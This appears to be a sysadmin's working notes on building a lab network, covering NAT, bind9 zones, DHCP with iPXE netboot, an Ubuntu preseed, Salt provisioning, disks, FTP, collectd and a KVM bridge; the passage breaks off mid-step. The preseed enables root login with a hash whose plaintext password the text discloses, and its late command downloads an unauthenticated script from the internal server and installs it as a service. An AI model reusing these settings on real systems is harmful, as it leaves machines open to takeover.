I create a virtual machine with two interfaces so that our environment is sandboxed, mostly because of the dhcp server we need to run.
After the install, update and upgrade
apt-get update
apt-get upgrade
Make the inside interface static and give it an address
vi /etc/network/interfaces
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface (outside)
auto ens160
iface ens160 inet dhcp
# The secondary network interface (inside)
auto ens192
iface ens192 inet static
address 10.20.30.1
netmask 255.255.0.0
Reboot
reboot
Configure kernel to forward packets
vi /etc/sysctl.conf
# Uncomment the next line to enable packet forwarding for IPv4
net.ipv4.ip_forward=1
Add iptables rules to masquerade the inside network behind the outside interface and to forward packets. New connections may be opened from the inside interface (ens192) outward; packets arriving on the outside interface (ens160) are only forwarded in when they belong to an established connection:
iptables -t nat -A POSTROUTING -o ens160 -j MASQUERADE
iptables -A FORWARD -i ens192 -o ens160 -j ACCEPT
iptables -A FORWARD -i ens160 -o ens192 -m state --state RELATED,ESTABLISHED -j ACCEPT
Note that the two FORWARD rules only restrict anything if the chain's default policy is DROP; Ubuntu's default policy is ACCEPT, which forwards everything in both directions.
Make the iptables rules persistent across reboots
apt-get install iptables-persistent
Now save the iptables rules:
netfilter-persistent save
netfilter-persistent reload
Other useful commands: sysctl -p applies the /etc/sysctl.conf change without a reboot, and the netstat-nat package shows the current NAT connection table.
sysctl -p
apt-get install netstat-nat
I’m going to combine the deployment services onto one system. It’s a basic Ubuntu 16.04 Server install and I’m calling it “server”.
Let’s install bind9 to have a nameserver running
apt-get install bind9
Edit /etc/bind/named.conf.options to get caching to work and add these forwarders inside the options block:
forwarders {
8.8.8.8;
8.8.4.4;
};
Restart bind
systemctl restart bind9
Install dnsutils
apt-get install dnsutils
Test the caching
nslookup
server localhost
google.com
Edit /etc/network/interfaces, give the server a static address and point its nameserver at localhost
# The primary network interface
auto ens160
iface ens160 inet static
address 10.20.30.10
netmask 255.255.255.0
network 10.20.30.0
broadcast 10.20.30.255
gateway 10.20.30.1
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 127.0.0.1
Reboot
reboot
I like to ssh to my router and then ssh to the clients on the inside network instead of working on the vSphere console, so I’d like the router to resolve the internal clients’ names. To do this we need to override the nameserver that the dhcp client gets; this is done in the file /etc/resolvconf/resolv.conf.d/head
vi /etc/resolvconf/resolv.conf.d/head
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 10.20.30.10
search thunderhouse.com
The warning in the file is talking about /etc/resolv.conf not this file.
Restart networking
systemctl restart networking
Note: another good command to know is
systemctl status networking
Test
root@router:~# nslookup google.com
Server: 10.20.30.10
Address: 10.20.30.10#53
Non-authoritative answer:
Name: google.com
Address: 172.217.4.110
Let’s set up the primary and reverse zones back on our server for the internal network. The computers will name themselves based on the reverse lookup. To add a DNS Forward and Reverse resolution to bind9, edit /etc/bind/named.conf.local
vi /etc/bind/named.conf.local
zone "thunderhouse.com" {
type master;
file "/etc/bind/db.thunderhouse.com";
};
zone "30.20.10.in-addr.arpa" {
type master;
notify no;
file "/etc/bind/db.10";
};
The file /etc/bind/db.thunderhouse.com holds the records for resolving hostnames to IP addresses for this domain/zone, and the file /etc/bind/db.10 holds the records for resolving IP addresses back to hostnames (the reverse zone for 10.20.30.0/24 is 30.20.10.in-addr.arpa). Now we add the records needed for forward resolution to /etc/bind/db.thunderhouse.com
First, copy /etc/bind/db.local to /etc/bind/db.thunderhouse.com
cp /etc/bind/db.local /etc/bind/db.thunderhouse.com
Next, edit the /etc/bind/db.thunderhouse.com and replace the following.
In the line which has SOA: localhost. – This is the FQDN of the server in charge of this domain. I’ve installed bind9 on 10.20.30.10, whose hostname is “server”, so replace “localhost.” with “server.thunderhouse.com.”. Make sure it ends with a dot (.).
In the line which has SOA: root.localhost. – This is the e-mail address of the person responsible for this server, written with a dot (.) instead of @. I’ve replaced it with tom.localhost.
In the line which has NS: localhost. – This defines the name server for the domain (NS). Change it to the fully qualified domain name of the name server, “server.thunderhouse.com.”. Make sure you have a “.” at the end.
Once the changes are done, the /etc/bind/db.thunderhouse.com file will look like the following:
;
; BIND data file
;
$TTL 604800
@ IN SOA server.thunderhouse.com. tom.localhost. (
5 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS server.thunderhouse.com.
@ IN MX 10 mail.thunderhouse.com.
router IN A 10.20.30.1
server IN A 10.20.30.10
mail IN A 10.20.30.10
ns IN CNAME server.thunderhouse.com.
ldap IN A 10.20.30.11
www IN A 10.20.30.12
print IN A 10.20.30.15
ad01 IN A 10.20.30.21
joomla IN A 10.20.30.22
kali IN A 10.20.30.23
workstation01 IN A 10.20.30.50
And the reverse zone will look like this:
;
; BIND reverse data file
;
$TTL 604800
@ IN SOA server.thunderhouse.com. tom.localhost. (
7 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS server.thunderhouse.com.
1 IN PTR router.thunderhouse.com.
10 IN PTR server.thunderhouse.com.
11 IN PTR ldap.thunderhouse.com.
12 IN PTR www.thunderhouse.com.
15 IN PTR print.thunderhouse.com.
21 IN PTR ad01.thunderhouse.com.
22 IN PTR joomla.thunderhouse.com.
23 IN PTR kali.thunderhouse.com.
50 IN PTR workstation01.thunderhouse.com.
Restart bind9, then check systemctl status and /var/log/syslog for any errors
systemctl restart bind9
systemctl status bind9
tail -100 /var/log/syslog
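Hand-edited zone files pick up exactly the kinds of defects that are hard to spot by eye: an NS target with a typo, a CNAME whose target is an address rather than a name, or a host with an A record but no PTR. The following is an added example, not part of the original post, that cross-checks a /24 forward zone against its reverse zone; the zone text it parses is constructed in the same layout as the files above and deliberately carries those three defects.

```python
import ipaddress
import re

# Constructed sample zones laid out like db.thunderhouse.com and db.10 above.
# They deliberately carry three defects: an NS target with a typo, a CNAME
# whose target is an IP literal, and a host with an A record but no PTR.
ORIGIN = "thunderhouse.com."
NETWORK = "10.20.30.0/24"

FORWARD_ZONE = """\
$TTL 604800
@ IN SOA server.thunderhouse.com. tom.localhost. ( 5 604800 86400 2419200 604800 )
@ IN NS server.thunderhouse.com.
@ IN MX 10 mail.thunderhouse.com.
router IN A 10.20.30.1
server IN A 10.20.30.10
mail IN A 10.20.30.10
ns IN CNAME 10.20.30.10
www IN A 10.20.30.12
kali IN A 10.20.30.23
"""

REVERSE_ZONE = """\
$TTL 604800
@ IN SOA server.thunderhouse.com. tom.localhost. ( 7 604800 86400 2419200 604800 )
@ IN NS server.thunderhosue.com.
1 IN PTR router.thunderhouse.com.
10 IN PTR server.thunderhouse.com.
12 IN PTR www.thunderhouse.com.
"""

# owner [ttl] IN type rdata  (the only record shape these zone files use)
RR = re.compile(r"^(\S+)\s+(?:\d+\s+)?IN\s+(\S+)\s+(.+)$")


def parse_records(zone_text):
    """Return (owner, type, rdata) tuples; comments, $TTL and the SOA are skipped."""
    records = []
    for raw in zone_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("$"):
            continue
        m = RR.match(line)
        if m and m.group(2) != "SOA":
            records.append((m.group(1), m.group(2), m.group(3).strip()))
    return records


def fqdn(owner, origin):
    """Qualify a relative owner name against the zone origin."""
    if owner == "@":
        return origin
    return owner if owner.endswith(".") else f"{owner}.{origin}"


def is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def check_zones(forward, reverse, origin=ORIGIN, network=NETWORK):
    """Cross-check a /24 forward zone and its reverse zone; return a list of problems."""
    net = ipaddress.ip_network(network)
    a_by_name, a_by_ip, ptr_by_ip = {}, {}, {}
    targets = []                      # (where, type, name) that must have an A record

    for owner, rtype, rdata in parse_records(forward):
        name = fqdn(owner, origin)
        if rtype == "A":
            ip = ipaddress.ip_address(rdata)
            a_by_name.setdefault(name, set()).add(ip)
            a_by_ip.setdefault(ip, set()).add(name)
        elif rtype in ("CNAME", "NS", "MX"):
            targets.append((name, rtype, rdata.split()[-1]))

    for owner, rtype, rdata in parse_records(reverse):
        if rtype == "NS":
            targets.append(("reverse zone", "NS", rdata))
        elif rtype == "PTR":
            # in a /24 reverse zone the owner label is the last octet
            ptr_by_ip.setdefault(net.network_address + int(owner), set()).add(rdata)

    problems = []
    for where, rtype, target in targets:
        if is_ip(target):
            problems.append(f"{where}: {rtype} target is an IP literal ({target})")
        elif not target.endswith("."):
            problems.append(f"{where}: {rtype} target {target} lacks a trailing dot")
        elif target not in a_by_name:
            problems.append(f"{where}: {rtype} target {target} has no A record")
    for ip in sorted(a_by_ip):
        if ip in net and ip not in ptr_by_ip:
            problems.append(f"{ip} ({', '.join(sorted(a_by_ip[ip]))}) has no PTR record")
    for ip in sorted(ptr_by_ip):
        for name in sorted(ptr_by_ip[ip]):
            if ip not in a_by_name.get(name, set()):
                problems.append(f"PTR {ip} -> {name} has no matching A record")
    return problems
```

Run check_zones(FORWARD_ZONE, REVERSE_ZONE) on the real files by reading them in; a clean pair of zones returns an empty list.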
We’re going to install the isc dhcp server on the internal network we’ve created.
apt-get install isc-dhcp-server
Edit dhcp server config
vi /etc/dhcp/dhcpd.conf
subnet 10.20.30.0 netmask 255.255.255.0 {
range 10.20.30.40 10.20.30.100;
option routers 10.20.30.1;
}
Restart the dhcp server
systemctl restart isc-dhcp-server
Check it with
systemctl status isc-dhcp-server
This is just a simple configuration to get us going.
Let’s add this to the dhcp configuration, above the subnet declaration.
# option definitions common to all supported networks...
option domain-name "thunderhouse.com";
option domain-name-servers 10.20.30.10;
# iPXE poop
option space ipxe;
option ipxe-encap-opts code 175 = encapsulate ipxe;
option ipxe.priority code 1 = signed integer 8;
option ipxe.keep-san code 8 = unsigned integer 8;
option ipxe.skip-san-boot code 9 = unsigned integer 8;
option ipxe.syslogs code 85 = string;
option ipxe.cert code 91 = string;
option ipxe.privkey code 92 = string;
option ipxe.crosscert code 93 = string;
option ipxe.no-pxedhcp code 176 = unsigned integer 8;
option ipxe.bus-id code 177 = string;
option ipxe.bios-drive code 189 = unsigned integer 8;
option ipxe.username code 190 = string;
option ipxe.password code 191 = string;
option ipxe.reverse-username code 192 = string;
option ipxe.reverse-password code 193 = string;
option ipxe.version code 235 = string;
option iscsi-initiator-iqn code 203 = string;
# Feature indicators
option ipxe.pxeext code 16 = unsigned integer 8;
option ipxe.iscsi code 17 = unsigned integer 8;
option ipxe.aoe code 18 = unsigned integer 8;
option ipxe.http code 19 = unsigned integer 8;
option ipxe.https code 20 = unsigned integer 8;
option ipxe.tftp code 21 = unsigned integer 8;
option ipxe.ftp code 22 = unsigned integer 8;
option ipxe.dns code 23 = unsigned integer 8;
option ipxe.bzimage code 24 = unsigned integer 8;
option ipxe.multiboot code 25 = unsigned integer 8;
option ipxe.slam code 26 = unsigned integer 8;
option ipxe.srp code 27 = unsigned integer 8;
option ipxe.nbi code 32 = unsigned integer 8;
option ipxe.pxe code 33 = unsigned integer 8;
option ipxe.elf code 34 = unsigned integer 8;
option ipxe.comboot code 35 = unsigned integer 8;
option ipxe.efi code 36 = unsigned integer 8;
option ipxe.fcoe code 37 = unsigned integer 8;
option ipxe.vlan code 38 = unsigned integer 8;
option ipxe.menu code 39 = unsigned integer 8;
option ipxe.sdi code 40 = unsigned integer 8;
option ipxe.nfs code 41 = unsigned integer 8;
# pxelinux poop
option space pxelinux;
option pxelinux.magic code 208 = string;
option pxelinux.configfile code 209 = text;
option pxelinux.pathprefix code 210 = text;
option pxelinux.reboottime code 211 = unsigned integer 32;
if exists user-class and option user-class = "iPXE" {
filename "http://server.thunderhouse.com/ipxe/boot.ipxe";
} else {
filename "undionly.kpxe";
}
This if statement will cause the DHCP server to first tell clients to download iPXE. Once iPXE starts up and does another DHCP request, it will be told the actual location of the configuration file to download. Without this, we would end up with a continuous loop of iPXE downloading itself.
The undionly.kpxe image is a PXE image that keeps UNDI loaded and unloads PXE. This is for clients which don’t natively support iPXE, which is pretty much everyone.
We need to build the undionly.kpxe image. First, install the dependencies.
apt-get install build-essential
apt-get install liblzma-dev
Clone the iPXE source
git clone git://git.ipxe.org/ipxe.git
Let’s make the image
cd ipxe/src
make
We need a tftp server to host the iPXE image we just created
apt-get install tftpd-hpa
Now move the iPXE image into place
cp ~/ipxe/src/bin/undionly.kpxe /var/lib/tftpboot
Check the status
systemctl status tftpd-hpa
We need a web server to serve the ipxe files, the preseed file and the install service.
apt-get install apache2
systemctl status apache2
We’ll install the salt master from apt.
apt-get install salt-master
systemctl status salt-master
mkdir -p /srv/salt
mkdir -p /srv/formulas
vi /etc/salt/autosign.conf
Make it look like this. Any minion whose id matches one of these patterns gets its key accepted without anyone running salt-key, so keep the patterns tight and only rely on this on a network you control:
www.thunderhouse.com
print.thunderhouse.com
ldap.thunderhouse.com
WORKSTATION[0-9]{2}.THUNDERHOUSE.COM
workstation[0-9]{2}.thunderhouse.com
We’ll use apache’s default location for serving web files, /var/www/html. The four iPXE scripts below live there: boot.ipxe is what the DHCP server hands to an iPXE client, boot.ipxe.cfg holds the variables, menu.ipxe is the menu and ubuntu.ipxe chains the Ubuntu installer.
vi /var/www/html/boot.ipxe
#!ipxe
# Global variables used by all other iPXE scripts
chain --autofree boot.ipxe.cfg ||
# Boot <boot-url>/menu.ipxe script if all other options have been exhausted
chain --replace --autofree ${menu-url} ||
vi /var/www/html/boot.ipxe.cfg
#!ipxe
## OPTIONAL: Base URL used to resolve most other resources
## No trailing slash: the scripts below append "/name" to it
set boot-url http://server.thunderhouse.com
# REQUIRED: Absolute URL to the menu script, used by boot.ipxe
# and commonly used at the end of simple override scripts
# in ${boot-dir}.
set menu-url ${boot-url}/menu.ipxe
# where we put our configs
#set config-dir ${boot-url}/configs
set config-dir ${boot-url}
# fedora bits
set fedora-mirror http://mirror.mit.edu/fedora/linux/releases
set fedora-release 23
set fedora-next 24
#Ubuntu bits
set ubuntu-mirror http://mirrors.mit.edu/ubuntu-releases/
set ubuntu-release 16.04
# memtest bits
# note: the plus (+) doesn't work in the url
#set memtest-latest ${config-dir}/memtest/memtest86plus-5.01.iso
# Some menu defaults
set menu-timeout 5000
set submenu-timeout ${menu-timeout}
isset ${menu-default} || set menu-default exit
# Figure out if client is 64-bit capable
cpuid --ext 29 && set arch x64 || set arch x86
cpuid --ext 29 && set archl amd64 || set archl i386
vi /var/www/html/menu.ipxe
#!ipxe
# Variables are specified in boot.ipxe.cfg
###################### MAIN MENU ####################################
:start
menu iPXE boot menu
item --key u ubuntu Boot Ubuntu ${ubuntu-release} Installer
item
# item --key d menu-diag Diagnostics tools...
item
item reboot Reboot computer
item --key x exit Exit iPXE and continue BIOS boot
choose --timeout ${menu-timeout} --default ${menu-default} selected || goto cancel
set menu-timeout 0
goto ${selected}
:shell
echo Type 'exit' to get back to the menu
shell
set menu-timeout 0
set submenu-timeout 0
goto start
:cancel
echo You cancelled the menu, dropping you to a shell
goto shell
:failed
echo Booting failed, dropping to shell
goto shell
:reboot
reboot
:exit
exit
:config
config
goto start
:back
set submenu-timeout 0
clear submenu-default
goto start
############ MAIN MENU ITEMS ############
:ubuntu
#chain --autofree --replace ${config-dir}/ubuntu/${ubuntu-release}/install.ipxe || goto failed
chain --autofree --replace ubuntu.ipxe || goto failed
# :menu-diag
# chain --autofree --replace ${boot-url}/menu.diag.ipxe
vi /var/www/html/ubuntu.ipxe
#!ipxe
dhcp
# Variables are specified in boot.ipxe.cfg
set base-url http://mirrors.mit.edu/ubuntu/dists/xenial/main/installer-amd64/current/images/netboot/ubuntu-installer/amd64/
kernel ${base-url}/linux
initrd ${base-url}/initrd.gz
imgargs linux auto=true url=http://server.thunderhouse.com/preseed.cfg hostname=${hostname} domain=thunderhouse.com
boot
The example preseed file is at https://help.ubuntu.com/16.04/installation-guide/example-preseed.txt (fetch it with wget). Use mine instead, because the example doesn’t have everything; diff the two if you want to see the difference.
To generate the password hash, install the mkpasswd command which is in the whois package:
apt-get install whois
mkpasswd -m sha-512
The hashed password is Passsword1. The preseed file, served as /var/www/html/preseed.cfg:
d-i debian-installer/locale string en_US
d-i console-setup/ask_detect boolean false
d-i keyboard-configuration/xkb-keymap select us
d-i keyboard-configuration/layoutcode string us
d-i netcfg/choose_interface select auto
d-i netcfg/get_hostname string unassigned-hostname
d-i netcfg/get_domain string unassigned-domain
d-i netcfg/wireless_wep string
d-i mirror/country string manual
d-i mirror/http/hostname string archive.ubuntu.com
d-i mirror/http/directory string /ubuntu
d-i mirror/http/proxy string
d-i passwd/root-login boolean true
d-i passwd/make-user boolean false
d-i passwd/root-password-crypted password $6$46V.E/.7e2hpmE$4JQSRGhVrrb/HthkQ27WWUlAROz/1Sm9iDfRwbh2V24xYG7OsxlgWnpTqitPxzn67Sa1KtiGOoUKkU6M/NvQ70
d-i user-setup/encrypt-home boolean false
d-i clock-setup/utc boolean true
d-i time/zone string US/Eastern
d-i clock-setup/ntp boolean true
d-i partman-auto/method string regular
d-i partman-lvm/device_remove_lvm boolean true
d-i partman-md/device_remove_md boolean true
d-i partman-lvm/confirm boolean true
d-i partman-lvm/confirm_nooverwrite boolean true
d-i partman-auto/choose_recipe select atomic
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
d-i partman-md/confirm boolean true
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
tasksel tasksel/first multiselect ubuntu-server
d-i pkgsel/include string wget
d-i pkgsel/update-policy select none
d-i grub-installer/only_debian boolean true
d-i grub-installer/with_other_os boolean true
d-i finish-install/reboot_in_progress note
d-i preseed/late_command string in-target sed -i 's/^GRUB_HIDDEN_TIMEOUT=0/GRUB_HIDDEN_TIMEOUT=5/' /etc/default/grub; \
in-target sed -i 's/^GRUB_HIDDEN_TIMEOUT_QUIET=true/GRUB_HIDDEN_TIMEOUT_QUIET=false/' /etc/default/grub; \
in-target update-grub; \
in-target mkdir /usr/share/mitmath; \
in-target wget -O /usr/share/mitmath/ubuntu-install http://server.thunderhouse.com/ubuntu-install; \
in-target chmod 755 /usr/share/mitmath/ubuntu-install; \
in-target wget -O /lib/systemd/system/ubuntu-install.service http://server.thunderhouse.com/ubuntu-install.service; \
in-target systemctl enable ubuntu-install.service; \
in-target systemctl start ubuntu-install.service; \
in-target sed -i '1 i\Please wait while system finishes configuration...' /etc/issue
The first-boot script, served as /var/www/html/ubuntu-install (the late command installs it as /usr/share/mitmath/ubuntu-install):
#!/bin/bash
salt_master="server.thunderhouse.com"
# show a message on the splash screen with our progress
# restart splash screen if the process is gone
message () {
pgrep plymouthd || plymouthd && plymouth show-splash
plymouth message --text="This workstation is being configured. Please wait, and do not reboot... ${1}..."
}
#sed '1 i\ Please wait while system finishes configuration...' /etc/issue
# can't do anything here without network
count=0
until [ $(ping -c 1 server.thunderhouse.com > /dev/null 2>&1 ; echo $?) = "0" ] ||
[ $count = "30" ]
do
# message "waiting for network"
echo "waiting for network" 1> /dev/tty1
sleep 2
let count=$count+1
done
# the loop above gives up after 30 tries, so test that count
if [ $count = "30" ]; then
echo "where's my network? dropping out."
exit 1
fi
# start SSH for debugging
systemctl start ssh
# make sure system time is correct
# message "setting correct system time"
echo "setting correct system time" 1> /dev/tty1
systemctl start chronyd
chronyc waitsync
# install salt
#message "installing salt"
echo "installing salt" 1> /dev/tty1
#yum -qy install salt-minion
apt-get --yes -q install python-software-properties
apt-add-repository ppa:saltstack/salt -y
apt-get --yes -q update
apt-get install --yes -q salt-minion
mkdir /etc/salt/minion.d
echo "master: ${salt_master}" > /etc/salt/minion.d/server.thunderhouse.com.conf
systemctl enable salt-minion
salt_return=1
until [ $salt_return -eq 0 ]; do
# message "Waiting for the Salt Master to accept our key..."
echo "Waiting for the Salt Master to accept our key..." 1> /dev/tty1
#salt-call test.ping && salt_return=0 || salt_return=1; sleep 30
systemctl start salt-minion.service
systemctl status salt-minion.service && salt_return=0 || salt_return=1; sleep 30
done
#message "Running system salt configurations..."
echo "Running system salt configurations..." 1> /dev/tty1
salt-call --log-level=quiet --out-file=/tmp/salt state.highstate
# salt exits clean with a status of "0"
if [ $? -eq 0 ]; then
mail -s "$(hostname) install complete." tmullaly@gmail.com </tmp/salt
systemctl disable ubuntu-install.service
echo "Configuration success!!! Rebooting..." 1> /dev/tty1
sleep 5;
sed -i '1d' /etc/issue
reboot
else
# message "Something went wrong :( SSH in to check."
echo "Something went wrong :( SSH in to check." 1> /dev/tty1
fi
The unit file, served as /var/www/html/ubuntu-install.service:
[Unit]
Description=Ubuntu Installer
After=network.target
Before=display-manager.service
Conflicts=display-manager.service
[Service]
Type=oneshot
ExecStart=/usr/share/mitmath/ubuntu-install
[Install]
WantedBy=network.target
Create the directory /srv/salt
mkdir -p /srv/salt
vi /srv/salt/top.sls
base:
'*':
- vm-tools
'print*':
- test
'workstation*':
- scratch
There are three salt states here: vm-tools is applied to all hosts, test to the print servers and scratch to the workstations.
vi /srv/salt/vm-tools.sls
{% if grains['os_family'] == 'Debian' %}
installing_vm-tools:
pkg.installed:
- name: open-vm-tools
{% endif %}
{% if grains['os_family'] == 'RedHat' %}
installing_vm-tools:
pkg.installed:
- name: open-vm-tools
{% endif %}
vi /srv/salt/test.sls
/test:
file:
- managed
- user: root
- group: root
vi /srv/salt/scratch.sls
/scratch:
file.directory:
- user: root
- group: root
- mode: 1777
Create a new vm on the internal network.
When it boots, hit f2 and make the network interface the first boot device.
Shut it down and get the mac address it created from the vSphere interface.
Edit /etc/dhcp/dhcpd.conf and add it to the bottom.
host www {
hardware ethernet 00:0c:29:2e:fe:ae;
fixed-address www.thunderhouse.com;
}
Restart the dhcp server
systemctl restart isc-dhcp-server
We’ll use the apache and the php formulas from github
cd /srv/formulas
git clone https://github.com/saltstack-formulas/php-formula
git clone https://github.com/saltstack-formulas/apache-formula
Add the formula locations to the master file on the salt master server
vi /etc/salt/master
The file_roots section will look like this (every formula you clone into /srv/formulas, including the php-formula cloned above, needs an entry here or its states won’t be found):
file_roots:
base:
- /srv/salt
- /srv/formulas/openldap-formula
- /srv/formulas/apache-formula
- /srv/formulas/php-formula
- /srv/formulas/ntp-formula
- /srv/formulas/openssh-formula
Save it and restart the salt master service.
systemctl restart salt-master
systemctl status salt-master
Add www to /srv/salt/top.sls
vi /srv/salt/top.sls
It’ll look something like this:
base:
'*':
- vm-tools
'www*':
- apache
- php
'print*':
- test
'ldap*':
- apache
- openldap.server
- ntp
'workstation*':
- scratch
- ubuntu-desktop
Stop X from starting up: edit /etc/default/grub with your favorite editor, e.g. nano:
sudo nano /etc/default/grub
Find out this line:
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
Change it to:
GRUB_CMDLINE_LINUX_DEFAULT="text"
Update Grub:
sudo update-grub
You can still start X manually by typing startx.
Performance: mount /nsm on separate disk
Edit the Policy: Computer -> Policies -> Administrative Templates
Network/Network Connections/Windows Firewall/Domain Profile
Windows Firewall: Allow ICMP exceptions: Enabled
Windows Firewall: Allow inbound remote administration exception: Enabled
I would only allow it from one IP address, that of a DC, for now anyway.
Link the policy to the OU that contains the computer accounts that you want to apply the policy to.
You should then be able to use the shutdown /i command on the allowed server to reboot (or shut down) the domain computers.
I had mounted a 100 GB virtual disk on /backups, now I’m replacing it with a 300 GB virtual disk.
root@itserver:~# fdisk /dev/sdc
Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
Building a new DOS disklabel with disk identifier 0x6cac81a9.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.
Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)
Command (m for help): p
Disk /dev/sdc: 322.1 GB, 322122547200 bytes
255 heads, 63 sectors/track, 39162 cylinders, total 629145600 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x6cac81a9
Device Boot Start End Blocks Id System
Command (m for help): m
Command action
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
l list known partition types
m print this menu
n add a new partition
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Command (m for help): n
Partition type:
p primary (0 primary, 0 extended, 4 free)
e extended
Select (default p):
Using default response p
Partition number (1-4, default 1):
Using default value 1
First sector (2048-629145599, default 2048):
Using default value 2048
Last sector, +sectors or +size{K,M,G} (2048-629145599, default 629145599):
Using default value 629145599
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
root@itserver:~# mkfs.ext4 /dev/sdc1
mke2fs 1.42.9 (4-Feb-2014)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
19660800 inodes, 78642944 blocks
3932147 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
2400 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872, 71663616
Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done
root@itserver:~# mount /dev/sdc1 /backups
root@itserver:~# mount
/dev/sda1 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sdb1 on /backups-old type ext4 (rw)
/dev/sdc1 on /backups type ext4 (rw)
root@itserver:~# vi /etc/fstab
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
# / was on /dev/sda1 during installation
UUID=5983a692-a8a0-4b8d-a5b0-45143fc6b816 / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=dad51df4-05e7-4eae-900d-49483ed33b3c none swap sw 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0
# backup disk
/dev/sdb1 /backups-old ext4 defaults 1 2
/dev/sdc1 /backups ext4 defaults 1 2
Now reboot to test.
apt-get install pure-ftpd
cd /etc/pure-ftpd/conf
echo "41000 42000" > PassivePortRange
echo "yes" > DontResolve
echo "33" > MinUID
pure-pw useradd someuser -u www-data -d /var/www
pure-pw mkdb
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 50pure
/etc/init.d/pure-ftpd restart
iptables -A INPUT -s $ip -p udp --dport 21 -j ACCEPT
iptables -A INPUT -s $ip -p tcp --dport 21 -j ACCEPT
iptables -A INPUT -s $ip -p udp --dport 41000:42000 -j ACCEPT
iptables -A INPUT -s $ip -p tcp --dport 41000:42000 -j ACCEPT
apt-get install collectd collectd-utils
vi /etc/collectd/collectd.conf
service collectd restart
/var/ossec/bin/syscheck_update -u local
cd /var
mkdir www
cd www
cp -r /usr/share/doc/collectd/examples/collection3 .
apt-get install librrds-perl libconfig-general-perl libhtml-parser-perl libregexp-common-perl
apt-get install fast-cgi
apt-get install spawn-fcgi fcgiwrap
location /nginx_status {
stub_status on;
access_log off;
allow 127.0.0.1;
deny all;
}
location ~ \.cgi$ {
root /var/www;
fastcgi_pass unix:/var/run/fcgiwrap.socket;
include /etc/nginx/fastcgi_params;
}
location /collection3/share/ {
alias /var/www/collection3/share/;
}
service nginx restart
The process to patch is to run apt-get update and apt-get upgrade, then update ossec’s database. This might be automated in the future. I’m leaving the default Ubuntu 12.04 AppArmor policies in place.
I’m using my old Mac Pro as my KVM server and it has two interfaces. I’m going to bridge the second interface.
Install bridge-utils:
apt-get install bridge-utils
Edit /etc/network/interfaces file:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
iface eth0 inet static
address 10.0.1.10
netmask 255.255.255.0
gateway 10.0.1.1
dns-nameservers 8.8.8.8 8.8.4.4
#auto eth1
#iface eth1 inet manual
auto br0
iface br0 inet dhcp
bridge_ports eth1
bridge_stp off
bridge_fd 0
bridge_maxwait 0
Restart networking:
service networking restart
tom@kvm:~$ brctl show
bridge name bridge id STP enabled interfaces
br0 8000.0017f20dd411 no eth1
virbr0 8000.000000000000 yes
create file br0.xml
<network>
<name>br0</name>
<forward mode="bridge"/>
<bridge name="br0" />
</network>
virsh net-list --all
Name State Autostart Persistent
----------------------------------------------------------
default active yes yes
Define the bridged interface
virsh net-define br0.xml
virsh net-list --all
Name State Autostart Persistent
----------------------------------------------------------
br0 active no yes
default active yes yes
virsh net-start br0
virsh edit (domain name)
Change the networking config from:
<interface type='network'>
<mac address='52:54:00:a6:99:d9'/>
<source network='default'/>
<model type='virtio'/>
<address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
</interface>
to:
